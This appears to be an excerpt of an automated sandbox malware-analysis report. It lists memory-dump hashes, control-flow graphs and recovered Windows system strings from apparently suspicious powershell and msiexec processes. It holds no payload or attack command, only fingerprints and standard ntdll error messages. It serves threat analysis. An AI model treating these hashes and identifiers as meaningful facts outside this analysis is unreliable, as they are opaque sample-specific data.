                                            • API ID:
                                            • String ID: 4'fq$d%lq$d%lq$d%lq$tPfq
                                            • API String ID: 0-3104067135
                                            • Opcode ID: 7f04f8456ee0804b2b43230a8dc0f70e94e8c4702e88e8a9b22efe04f75fff3e
                                            • Instruction ID: 62bb5b7b3241dcec840d9d0668d521ab1447abe23ebf318ea07d32f515fac8b2
                                            • Opcode Fuzzy Hash: 7f04f8456ee0804b2b43230a8dc0f70e94e8c4702e88e8a9b22efe04f75fff3e
                                            • Instruction Fuzzy Hash: 4331A2B1B40215DFCB55EF58C580B6ABBA2FF88750F148999E905AB351CB31EC01CBB1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1996888114.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ofq$(ofq$(ofq$(ofq
                                            • API String ID: 0-875029461
                                            • Opcode ID: 211878b4b7f5374b49e164372fa28e9fcf29d20d975bb643f39282e3f05e1edb
                                            • Instruction ID: f61a9070c03022b9e20eb9163421be1aff9b8a6fcf0e656a8bbd76309d7c0153
                                            • Opcode Fuzzy Hash: 211878b4b7f5374b49e164372fa28e9fcf29d20d975bb643f39282e3f05e1edb
                                            • Instruction Fuzzy Hash: FEF148B1B44305DFDB56AF69C8447AABBA2EF81350F1488FAE505CB291DB31D881CB71
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1996888114.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (fl$(fl$(fl$(fl
                                            • API String ID: 0-2641983618
                                            • Opcode ID: 74a425c762277262303958fae7c8a441821b779fdb54001a918814e7ee2fd886
                                            • Instruction ID: af14bcb45302bde0eca78e4f0898ec82500109b32bacee04144f530daba0c9b2
                                            • Opcode Fuzzy Hash: 74a425c762277262303958fae7c8a441821b779fdb54001a918814e7ee2fd886
                                            • Instruction Fuzzy Hash: 93A171B0E40305DBDB68DF94C441A6ABBB2FF89754F28C929D85AAB744C731E841CBD1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1996888114.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (fl$(fl$(fl$(fl
                                            • API String ID: 0-2641983618
                                            • Opcode ID: 54ec6d123ee80bc08df544d3d7ac487fa5ddce52dc4985aaa4264b0d952f86ba
                                            • Instruction ID: f76037dafabda952fdfb388e28e43bbe43df5f0261bca2206e805f8a70c44a78
                                            • Opcode Fuzzy Hash: 54ec6d123ee80bc08df544d3d7ac487fa5ddce52dc4985aaa4264b0d952f86ba
                                            • Instruction Fuzzy Hash: CB719CB0E50205DBDB58DFA8C491A6ABBF2AF88314F258469D906AB750CB31EC41CFD1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1996888114.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (fl$(fl$4'fq$4l
                                            • API String ID: 0-3080159676
                                            • Opcode ID: b6576aac14bcb53197d42a9993f1a9c3d2ffa6f41eab6a4acbafa1175a10568b
                                            • Instruction ID: 37be9c4c805940a4fab012d1693d89cc2e182e58efd685dd257c6bd8963e7a35
                                            • Opcode Fuzzy Hash: b6576aac14bcb53197d42a9993f1a9c3d2ffa6f41eab6a4acbafa1175a10568b
                                            • Instruction Fuzzy Hash: E161D0B0B40301EFD754DB58C880E6ABFF2AF85354F198869E405AB761CBB2E841CB52
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1996888114.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $fq$$fq$$fq$$fq
                                            • API String ID: 0-2113499236
                                            • Opcode ID: fba23b2536322b7de87947ffd7bfe04d72cb20b40927cd2da181b04711f5990c
                                            • Instruction ID: 94f4025af85d11f995300632e73057f15aa5266aae3dbabb0860697a0615ccf4
                                            • Opcode Fuzzy Hash: fba23b2536322b7de87947ffd7bfe04d72cb20b40927cd2da181b04711f5990c
                                            • Instruction Fuzzy Hash: 54216BF23503465BDBB4AEBEC841767BADB9BC1395F20882A9505CB382DD35C848C362
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1996888114.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $fq$$fq$$fq$$fq
                                            • API String ID: 0-2113499236
                                            • Opcode ID: c0b77485cb73e9520ee386cdf83f5a603f024e4df7d05df024edf8d876eaf162
                                            • Instruction ID: 41d8c83b012ebb16c68245d4f24fc2bc396995e123c096ca8b6b1f9014757e22
                                            • Opcode Fuzzy Hash: c0b77485cb73e9520ee386cdf83f5a603f024e4df7d05df024edf8d876eaf162
                                            • Instruction Fuzzy Hash: 43119DF1BA1307DFDFA0AE55C54066AB7B5AF853E0F988A6AD80497242DB31C940CB53
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1996888114.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$$fq$$fq
                                            • API String ID: 0-2206495126
                                            • Opcode ID: e3eea7b7d46ba5278951aebe290dabc8368bcfd59419f96c556f93eb2da938c0
                                            • Instruction ID: 12c3ad6e804fc3138d97bc381174d912d8612dd1d01b731bcfb1f04092940b72
                                            • Opcode Fuzzy Hash: e3eea7b7d46ba5278951aebe290dabc8368bcfd59419f96c556f93eb2da938c0
                                            • Instruction Fuzzy Hash: 2401F5A161E3CA4FC727277898300667FB65F8359071A40EFC490CF693C9185C56CBA7

                                            Execution Graph

                                            Execution Coverage:0%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:100%
                                            Total number of Nodes:1
                                            Total number of Limit Nodes:0
                                            execution_graph 38000 1fd52c70 LdrInitializeThunk

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1 1fd52df0-1fd52dfc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 26ea959ecbc08e3c5a692449f72d5cb9f75b49c7d1b30f1a0365e54e9d931e93
                                            • Instruction ID: 7d6067d6fceebd4ef9bbb52b834bf3c6f04cbc4de53aa151957ba185d742b11b
                                            • Opcode Fuzzy Hash: 26ea959ecbc08e3c5a692449f72d5cb9f75b49c7d1b30f1a0365e54e9d931e93
                                            • Instruction Fuzzy Hash: 769002B120240413D251B158450571B000D4BD0251FD5C412B4424628D97568A52A221

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 1fd52c70-1fd52c7c LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 6e81968624b177e8885052e045aaa3d8674489d19363b6717de21364d6c20bf5
                                            • Instruction ID: a06da6664b197b824784c0626a8a47376b34139d2897ea6e4d3f6695e84b26a1
                                            • Opcode Fuzzy Hash: 6e81968624b177e8885052e045aaa3d8674489d19363b6717de21364d6c20bf5
                                            • Instruction Fuzzy Hash: 649002B120248803D250B158840575E00094BD0311F99C411B8424728D879589917221

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2 1fd535c0-1fd535cc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0108543be1f5d1ca3935b896a753dd0f53cc4c2a16c0a62d1a0d010c5efa43fd
                                            • Instruction ID: 3455699255c350bb85aa67ba0fa5cc4d993f447422ae452f6c7b9e16b7f2a6ee
                                            • Opcode Fuzzy Hash: 0108543be1f5d1ca3935b896a753dd0f53cc4c2a16c0a62d1a0d010c5efa43fd
                                            • Instruction Fuzzy Hash: 249002B160650403D240B158451571A10094BD0211FA5C411B4424638D87958A5166A2

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3 1fdc8d10-1fdc8d27 call 1fd67e54 GetPEB 6 1fdc8d2e 3->6 7 1fdc8d29-1fdc8d2c 3->7 8 1fdc8d33-1fdc8d41 GetPEB 6->8 7->8 9 1fdc8d57-1fdc8d64 8->9 10 1fdc8d43-1fdc8d51 8->10 12 1fdc8d6a-1fdc8d70 9->12 13 1fdc8f3b-1fdc8f5b call 1fd9f290 9->13 10->9 11 1fdc9000-1fdc9002 10->11 14 1fdc9005-1fdc900f 11->14 15 1fdc8ec4-1fdc8f0f call 1fd9f290 * 3 12->15 16 1fdc8d76-1fdc8d7c 12->16 30 1fdc8f5d 13->30 31 1fdc8f62-1fdc8f7a call 1fd9f290 13->31 19 1fdc901f-1fdc903a 14->19 20 1fdc9011-1fdc901d call 1fd9a960 14->20 67 1fdc8f34-1fdc8f39 15->67 68 1fdc8f11-1fdc8f16 15->68 21 1fdc8ddd-1fdc8de5 16->21 22 1fdc8d7e-1fdc8d88 16->22 20->19 25 1fdc8ebc-1fdc8ebf 21->25 26 1fdc8deb-1fdc8df5 21->26 28 1fdc8d8a-1fdc8d9e call 1fd9f290 22->28 29 1fdc8da3-1fdc8dd8 call 1fd9f290 * 3 22->29 39 1fdc8f9f-1fdc8fb8 call 1fd9f290 25->39 34 1fdc8e46-1fdc8e64 call 1fd9f290 26->34 35 1fdc8df7-1fdc8dfb 26->35 28->39 59 1fdc8f95-1fdc8f9c call 1fd9f290 29->59 30->31 48 1fdc8f7c-1fdc8f8e call 1fd9f290 31->48 49 1fdc8f90 31->49 56 1fdc8e86 34->56 57 1fdc8e66-1fdc8e84 call 1fd9f290 * 2 34->57 35->34 43 1fdc8dfd-1fdc8e1f call 1fd9f290 35->43 61 1fdc8fcc-1fdc8fe4 call 1fd9f290 39->61 62 1fdc8fba-1fdc8fc9 call 1fd9f290 39->62 71 1fdc8e2b 43->71 72 1fdc8e21-1fdc8e29 43->72 48->39 49->59 70 1fdc8e8b-1fdc8e92 call 1fd9f290 56->70 93 1fdc8e95-1fdc8e9c 57->93 59->39 61->14 85 1fdc8fe6-1fdc8ffe call 1fd9f290 61->85 62->61 67->59 77 1fdc8f2d-1fdc8f32 68->77 78 1fdc8f18-1fdc8f1d 68->78 70->93 82 1fdc8e2d-1fdc8e2e 71->82 83 1fdc8e3f-1fdc8e44 71->83 81 1fdc8e33-1fdc8e3d call 1fd9f290 72->81 77->59 78->77 87 1fdc8f1f-1fdc8f24 78->87 81->93 82->81 83->70 85->14 87->39 92 1fdc8f26-1fdc8f2b 87->92 92->59 93->39
                                            Strings
                                            • *** enter .exr %p for the exception record, xrefs: 1FDC8FA1
                                            • The resource is owned exclusively by thread %p, xrefs: 1FDC8E24
                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 1FDC8E4B
                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 1FDC8FEF
                                            • *** enter .cxr %p for the context, xrefs: 1FDC8FBD
                                            • The instruction at %p tried to %s , xrefs: 1FDC8F66
                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 1FDC8DB5
                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 1FDC8E86
                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 1FDC8DA3
                                            • Go determine why that thread has not released the critical section., xrefs: 1FDC8E75
                                            • a NULL pointer, xrefs: 1FDC8F90
                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 1FDC8E02
                                            • write to, xrefs: 1FDC8F56
                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 1FDC8E3F
                                            • The resource is owned shared by %d threads, xrefs: 1FDC8E2E
                                            • read from, xrefs: 1FDC8F5D, 1FDC8F62
                                            • *** then kb to get the faulting stack, xrefs: 1FDC8FCC
                                            • This failed because of error %Ix., xrefs: 1FDC8EF6
                                            • *** An Access Violation occurred in %ws:%s, xrefs: 1FDC8F3F
                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 1FDC8DC4
                                            • an invalid address, %p, xrefs: 1FDC8F7F
                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 1FDC8D8C
                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 1FDC8F2D
                                            • <unknown>, xrefs: 1FDC8D2E, 1FDC8D81, 1FDC8E00, 1FDC8E49, 1FDC8EC7, 1FDC8F3E
                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 1FDC8DD3
                                            • *** Inpage error in %ws:%s, xrefs: 1FDC8EC8
                                            • The instruction at %p referenced memory at %p., xrefs: 1FDC8EE2
                                            • The critical section is owned by thread %p., xrefs: 1FDC8E69
                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 1FDC8F26
                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 1FDC8F34
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                            • API String ID: 0-108210295
                                            • Opcode ID: 62f29e1eabfeb32dd0cf36d709b02ca7da26f915e739daa43227b4283842357f
                                            • Instruction ID: 8e6b04534ea51c6c1417175e8acab822921488d732c6c729cd5eb7bda4831f4d
                                            • Opcode Fuzzy Hash: 62f29e1eabfeb32dd0cf36d709b02ca7da26f915e739daa43227b4283842357f
                                            • Instruction Fuzzy Hash: D581C379910210BFDB91EA64CC46EBB3B35EF56724F010188F108AF252E73AA856D772

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 96 1fdcfcab-1fdcfcc3 GetPEB 97 1fdcfcc5-1fdcfce0 GetPEB call 1fd0b970 96->97 98 1fdcfce2-1fdcfce3 call 1fd0b970 96->98 101 1fdcfce8-1fdcfd0a call 1fd0b970 97->101 98->101 105 1fdcfd0c 101->105 106 1fdcfd81-1fdcfd8a GetPEB 101->106 107 1fdcfd7c 105->107 108 1fdcfd3d-1fdcfd42 105->108 109 1fdcfd59-1fdcfd5e 105->109 110 1fdcfd1a-1fdcfd1f 105->110 111 1fdcfd75-1fdcfd7a 105->111 112 1fdcfd36-1fdcfd3b 105->112 113 1fdcfd52-1fdcfd57 105->113 114 1fdcfd13-1fdcfd18 105->114 115 1fdcfd6e-1fdcfd73 105->115 116 1fdcfd2f-1fdcfd34 105->116 117 1fdcfd28-1fdcfd2d 105->117 118 1fdcfd4b-1fdcfd50 105->118 119 1fdcfd44-1fdcfd49 105->119 120 1fdcfd67-1fdcfd6c 105->120 121 1fdcfd60-1fdcfd65 105->121 122 1fdcfd21-1fdcfd26 105->122 123 1fdcfd8c-1fdcfda7 GetPEB call 1fd0b970 106->123 124 1fdcfda9-1fdcfdaa call 1fd0b970 106->124 107->106 108->106 109->106 110->106 111->106 112->106 113->106 114->106 115->106 116->106 117->106 118->106 119->106 120->106 121->106 122->106 128 1fdcfdaf-1fdcfdca call 1fd0b970 123->128 124->128 131 1fdcfdcc-1fdcfdd5 GetPEB 128->131 132 1fdcfe0d-1fdcfe13 128->132 135 1fdcfdf4-1fdcfdf5 call 1fd0b970 131->135 136 1fdcfdd7-1fdcfdf2 GetPEB call 1fd0b970 131->136 133 1fdcfe15-1fdcfe1e GetPEB 132->133 134 1fdcfe56-1fdcfe5c 132->134 141 1fdcfe3d-1fdcfe3e call 1fd0b970 133->141 142 1fdcfe20-1fdcfe3b GetPEB call 1fd0b970 133->142 137 1fdcfe5e-1fdcfe67 GetPEB 134->137 138 1fdcfe9f-1fdcfea5 134->138 146 1fdcfdfa-1fdcfe0c call 1fd0b970 135->146 136->146 144 1fdcfe69-1fdcfe84 GetPEB call 1fd0b970 137->144 145 1fdcfe86-1fdcfe87 call 1fd0b970 137->145 148 1fdcfeaf-1fdcfeb8 GetPEB 138->148 149 1fdcfea7-1fdcfead 138->149 158 1fdcfe43-1fdcfe55 call 1fd0b970 141->158 142->158 164 1fdcfe8c-1fdcfe9e call 1fd0b970 144->164 145->164 146->132 154 1fdcfeba-1fdcfed5 GetPEB call 1fd0b970 148->154 155 1fdcfed7-1fdcfed8 call 1fd0b970 148->155 149->148 153 1fdcfef7-1fdcff00 GetPEB 149->153 162 1fdcff1f-1fdcff20 call 1fd0b970 153->162 163 1fdcff02-1fdcff1d GetPEB call 1fd0b970 153->163 169 1fdcfedd-1fdcfef4 call 1fd0b970 154->169 155->169 158->134 176 1fdcff25-1fdcff3a call 1fd0b970 162->176 163->176 164->138 169->153
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                            • API String ID: 0-2897834094
                                            • Opcode ID: c156897247560e3afef21432fe84b86b5ce92214bd951ec4c105063ce0415ba3
                                            • Instruction ID: 5290d8710326aa490e122603869d03ac77b78d6ad78328f49d52bf84fd2679b9
                                            • Opcode Fuzzy Hash: c156897247560e3afef21432fe84b86b5ce92214bd951ec4c105063ce0415ba3
                                            • Instruction Fuzzy Hash: EE61C83A516251DFC2C1BF54D888DB173E8EB4673074E45DEF8008B392D636AC858BB1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 496 1fd429f9-1fd42a73 497 1fd8261b-1fd82634 call 1fd9f290 496->497 498 1fd42a79-1fd42a7b 496->498 507 1fd8263e-1fd82649 call 1fd0bae0 497->507 499 1fd82618 498->499 500 1fd42a81-1fd42a84 498->500 499->497 500->499 502 1fd42a8a-1fd42a8d 500->502 502->499 504 1fd42a93-1fd42a99 502->504 505 1fd42cc7-1fd42cd7 call 1fd54c30 504->505 506 1fd42a9f-1fd42ac0 504->506 509 1fd42ac6-1fd42aca 506->509 510 1fd822e2-1fd822f5 call 1fd9f290 506->510 521 1fd8264e-1fd82659 call 1fd52b60 507->521 513 1fd42ad0-1fd42b4b call 1fd42cf0 509->513 514 1fd822ff-1fd82310 509->514 510->514 525 1fd42b51-1fd42b58 513->525 526 1fd823c3 513->526 519 1fd8231c-1fd82328 call 1fd5a9f0 514->519 520 1fd82312-1fd82317 514->520 528 1fd8232a 519->528 529 1fd82334-1fd82353 519->529 520->505 540 1fd8265e-1fd8266f GetPEB call 1fd23ca0 521->540 531 1fd823cd-1fd823ff call 1fd42f98 525->531 532 1fd42b5e-1fd42b81 525->532 526->531 528->529 534 1fd82384 529->534 535 1fd82355-1fd8236a call 1fd25e40 529->535 544 1fd82428-1fd82443 call 1fd42e9c 531->544 545 1fd82401-1fd8240e 531->545 536 1fd42b87-1fd42bcd call 1fd42cf0 532->536 537 1fd42c3b 532->537 542 1fd8238a-1fd823bb call 1fd589a0 534->542 553 1fd8236c 535->553 554 1fd82376-1fd82382 535->554 561 1fd824ae-1fd824b3 536->561 562 1fd42bd3-1fd42be1 536->562 541 1fd42c3d 537->541 540->505 548 1fd824b8-1fd824d1 call 1fd9f290 541->548 549 1fd42c43-1fd42c4a 541->549 542->526 576 1fd82410-1fd82412 544->576 577 1fd82445 544->577 552 1fd82417-1fd82420 call 1fd9f290 545->552 556 1fd824db-1fd824fb call 1fd31cf0 548->556 549->556 557 1fd42c50-1fd42c6e call 1fd42e9c 549->557 552->544 553->554 554->542 582 1fd824fd-1fd8251c call 1fd9f290 556->582 583 1fd82521-1fd82536 556->583 585 1fd42c74 557->585 586 1fd82601-1fd82610 call 1fd9f290 557->586 567 1fd42c7f-1fd42c9a call 1fd42cf0 561->567 569 1fd42be7-1fd42bea 562->569 570 1fd8244c-1fd8244f 562->570 587 1fd42c9f-1fd42ca6 567->587 571 1fd42bf0-1fd42bf7 569->571 572 1fd42cda-1fd42cdd 569->572 570->548 579 1fd82451-1fd82454 570->579 580 1fd8245f-1fd8246a call 1fd52b60 571->580 581 1fd42bfd-1fd42c2f call 1fd42f98 571->581 572->541 584 1fd42ce3-1fd42ce9 572->584 576->552 577->570 579->580 603 1fd82476-1fd8247c 580->603 602 1fd42c35 581->602 581->603 595 1fd42c76-1fd42c7d 582->595 593 1fd82538-1fd82550 583->593 594 1fd82552 583->594 584->536 585->595 586->499 587->507 588 1fd42cac-1fd42cb3 587->588 588->521 596 1fd42cb9-1fd42cc1 588->596 601 1fd82554-1fd825b5 call 1fd52dc0 593->601 594->601 595->567 595->587 596->505 596->540 609 1fd825d9-1fd825db 601->609 610 1fd825b7-1fd825be 601->610 602->537 605 1fd82489-1fd824a9 call 1fd9f290 603->605 606 1fd8247e-1fd82484 603->606 605->567 606->572 609->557 611 1fd825e1-1fd825fc call 1fd9f290 609->611 610->609 613 1fd825c0-1fd825d4 call 1fd52b60 GetPEB call 1fd23ca0 610->613 611->595 613->609
                                            Strings
                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 1FD824C0
                                            • @, xrefs: 1FD8259B
                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 1FD82412
                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 1FD82624
                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 1FD82506
                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 1FD82602
                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 1FD82409
                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 1FD825EB
                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 1FD82498
                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 1FD822E4
                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 1FD8261F
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                            • API String ID: 0-4009184096
                                            • Opcode ID: 5e329c7bacf6e3cc0fef31ec0cccde86efe7f3427c8359c789df90833ba05ba5
                                            • Instruction ID: a277da0645a298e889bb8cc2a9b6da0710134d87a5922cb3d1b325dcc79b910f
                                            • Opcode Fuzzy Hash: 5e329c7bacf6e3cc0fef31ec0cccde86efe7f3427c8359c789df90833ba05ba5
                                            • Instruction Fuzzy Hash: E40252F5D002299BDBA1CB14CD80BEDB7B8AF44315F5041DAE648A7281E771AF84CF69

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
